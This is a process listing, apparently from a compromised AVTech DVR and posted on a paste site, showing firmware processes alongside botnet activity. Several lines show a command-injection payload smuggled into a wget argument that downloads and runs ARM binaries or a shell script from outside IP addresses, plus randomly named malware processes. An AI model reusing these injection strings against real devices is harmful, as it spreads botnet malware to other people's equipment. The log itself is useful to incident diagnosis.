  349. 363 root 0:00 [xfslogd]
  350. 365 root 0:00 [crypto]
  351. 377 root 0:00 [kapmd]
  352. 417 root 0:00 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  353. 420 root 0:00 sh -c /bin/wget -q -O /tmp/404.log --user=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.244.25.150/armv5l -O 24.heat.arm5; chmod 777 24.heat.arm5; ./24.heat.arm5 avtech) --password=admin "http://google.com:80//" --auth-no-challenge
  354. 422 root 0:00 [/usr/sbin/dropb]
  355. 429 root 0:08 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  356. 430 root 1:30 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  357. 431 root 1:32 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  358. 433 root 0:01 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  359. 439 root 0:00 [scsi_eh_0]
  360. 442 root 0:00 [scsi_eh_1]
  361. 483 root 0:13 minissdpd -i eth0
  362. 623 root 0:00 [kpsmoused]
  363. 645 root 0:00 [deferwq]
  364. 746 root 0:19 [yaffs-bg-1]
  365. 755 root 0:31 [yaffs-bg-1]
  366. 761 root 0:16 natt 8c369e13-3964-48df-b30a-320418ec4837 MAC000E53306AB9
  367. 763 root 0:21 [yaffs-bg-1]
  368. 837 root 0:00 [loop0]
  369. 1025 root 277:55 [WatchDog]
  370. 1268 root 5:53 dbus-daemon --config-file=/mnt/mtd/session.conf --fork --print-address
  371. 1378 root 0:00 XmlSeviceD -l
  372. 1379 root 62:00 XmlSeviceD -l
  373. 1382 root 0:10 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  374. 1424 root 0:00 [loop1]
  375. 1623 root 0:27 {[vejhbtksewi]} [ujjmatpbnqtf]
  376. 1885 root 10:15 {chkinet.sh} /bin/sh /tmp/chkinet.sh
  377. 1899 root 0:00 searchd
  378. 1900 root 0:00 searchd
  379. 2011 root 4:08 mcu_process
  380. 2022 root 14:55 record_process
  381. 2023 root 31:44 motion_process
  382. 2024 root 13:39 playback
  383. 2025 root 37:30 keyboard_process
  384. 2026 root 2:35 ir_process
  385. 2027 root 19:28 buzzer_process
  386. 2028 root 17:13 vloss_process
  387. 2029 root 45:27 alarm_process
  388. 2030 root 5:04 remote_control_process
  389. 2031 root 0:00 DvdBurningThread
  390. 2032 root 3:56 tracking_process
  391. 2033 root 2:36 nvr_pir_process
  392. 2150 root 1:31 smsd
  393. 2156 root 1634:4 cvc_stack_server /dev/ttyAMA3 38400
  394. 2170 root 0:00 DownloadD
  395. 2173 root 1:40 DownloadD
  396. 2190 root 0:00 CgiDaemon
  397. 2194 root 0:44 CgiDaemon
  398. 2246 root 0:00 streamd -c /tmp/stream.conf
  399. 2258 root 44:23 streamd -c /tmp/stream.conf
  400. 2326 root 0:31 cvc_osd_process
  401. 2350 root 0:30 avk_cvc_protocol
  402. 2386 root 2:48 avm601_pir_process
  403. 2408 root 22:38 cvc_diagnostic_process
  404. 2421 root 7:02 cvc_avkm1_process
  405. 2426 root 2:48 tvi_msg_process
  406. 2447 root 3603:2 glue -v 0 -l 65535
  407. 2459 root 4:41 [HDMI_kthread]
  408. 2461 root 1097:5 [HI_VFMW_VideoDe]
  409. 2570 root 9:58 cvc_device_handle_process
  410. 2627 root 111:25 ActionD
  411. 2628 root 20:16 cntmgr
  412. 2629 root 2:28 FakeMP
  413. 2634 root 0:00 desktop
  414. 2637 root 283:07 [desktop_auto]
  415. 2646 root 10:51 {StartNtpDaemon.} /bin/sh /bin/StartNtpDaemon.sh
  416. 2756 root 0:32 crond
  417. 2766 root 0:00 /sbin/getty -L ttyS000 115200 vt100
  418. 3254 root 3:19 [kworker/0:1H]
  419. 3606 root 0:00 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  420. 3609 root 0:00 sh -c /bin/wget -q -O /tmp/3591.log --user=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.244.25.150/armv5l -O 93.heat.arm5; chmod 777 93.heat.arm5; ./93.heat.arm5 avtech) --password=admin "http://google.com:80//" --auth-no-challenge
  421. 3611 root 5:08 [jbd2/sda2-8]
  422. 3612 root 0:00 [ext4-dio-unwrit]
  423. 3613 root 0:00 [/usr/sbin/dropb]
  424. 3627 root 0:13 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  425. 3628 root 2:14 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  426. 3629 root 2:18 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  427. 3631 root 0:02 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  428. 4154 root 0:03 {[vejhbtksewi]} [ujjmatpbnqtf]
  429. 4565 root 0:03 {[wygbnmpugatw]} [qrcnohqhuq]
  430. 4769 root 22:34 timer_process
  431. 5856 root 0:13 [kworker/u2:1]
  432. 7677 root 0:00 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  433. 7680 root 0:00 sh -c /bin/wget -q -O /tmp/7670.log --user=admin ;XmlAp r Account.User1.Password>$(wget http://199.247.7.233/mybins.sh -O /tmp/snickers.sh; chmod 777 snickers.sh; sh /tmp/snickers.sh; rm -rf /tmp/snickers.sh) --password=admin "http://google.com:80//" --auth-no-challenge
  434. 7682 root 0:00 [rm]
  435. 7749 root 0:00 {p} ./armv7l
  436. 7814 root 2246:5 {v~xz} ./armv4l
  437. 7819 root 2246:5 {vzw} ./armv5l
  438. 11346 root 2:52 [kworker/0:0]
  439. 11376 root 0:00 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  440. 11379 root 0:00 sh -c /bin/wget -q -O /tmp/11369.log --user=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.244.25.150/armv5l -O 6.heat.arm5; chmod 777 6.heat.arm5; ./6.heat.arm5 avtech) --password=admin "http://google.com:80//" --auth-no-challenge
  441. 11385 root 0:00 [/usr/sbin/dropb]
  442. 11400 root 0:06 {/usr/sbin/dropb} /usr/sbin/dropbear h
  443. 11401 root 0:58 {/usr/sbin/dropb} /usr/sbin/dropbear h
  444. 11402 root 0:59 {/usr/sbin/dropb} /usr/sbin/dropbear h
  445. 11404 root 0:00 {/usr/sbin/dropb} /usr/sbin/dropbear h
  446. 11569 root 0:36 [kworker/0:1]
  447. 11689 root 0:00 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  448. 11693 root 0:00 sh -c /bin/wget -q -O /tmp/11678.log --user=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.244.25.150/armv5l -O 21.heat.arm5; chmod 777 21.heat.arm5; ./21.heat.arm5 avtech) --password=admin "http://google.com:80//" --auth-no-challenge
  449. 11696 root 0:00 [/usr/sbin/dropb]
  450. 11706 root 0:14 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  451. 11707 root 2:32 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  452. 11708 root 2:35 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  453. 11710 root 0:00 {/usr/sbin/dropb} /usr/sbin/dropbear ch
  454. 14446 root 0:01 {hi6fh009akjg8rd} 7ztjzmpzh6ccgcrrq0w
  455. 14449 root 28:42 {hi6fh009akjg8rd} 7ztjzmpzh6ccgcrrq0w
  456. 14452 root 28:45 {hi6fh009akjg8rd} 7ztjzmpzh6ccgcrrq0w
  457. 14453 root 0:14 {hi6fh009akjg8rd} 7ztjzmpzh6ccgcrrq0w
  458. 19232 root 0:01 [kworker/u2:2]
  459. 19990 root 0:01 ntpd -4 -c /etc/ntp.conf -I eth0 -g -p /tmp/ntpd.pid
  460. 27799 root 50:30 {ARteggocoAKo} eDoeooRRAt
  461. 29465 root 0:00 [kworker/u2:0]
  462. 30447 root 0:00 /tmp/HTML/cgi-bin/power/NetworkBk.cgi
  463. 30494 root 0:00 cat /tmp/fifo/fifo
  464. 30495 root 0:00 {fifo_srv.sh} /bin/sh /tmp/fifo_srv.sh -b /tmp/fifo
  465. 30624 root 0:00 sleep 6
  466. 30632 root 0:00 sh -c mpstat -P ALL 3 1|grep all|tail -n 1|awk '{print $11}' > /tmp/tmpCpuIdle ; cp -f /tmp/tmpCpuIdle /tmp/CpuIdle
  467. 30633 root 0:00 mpstat -P ALL 3 1
  468. 30634 root 0:00 grep all
  469. 30635 root 0:00 tail -n 1
  470. 30636 root 0:00 awk {print $11}
  471. 30637 root 0:00 /tmp/HTML/cgi-bin/supervisor/adcommand.cgi
  472. 30639 root 0:00 sh -c mkdir -p /tmp/shellCmd; ps aux > /tmp/shellCmd/414A1B6807
  473. 30641 root 0:00 ps aux
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement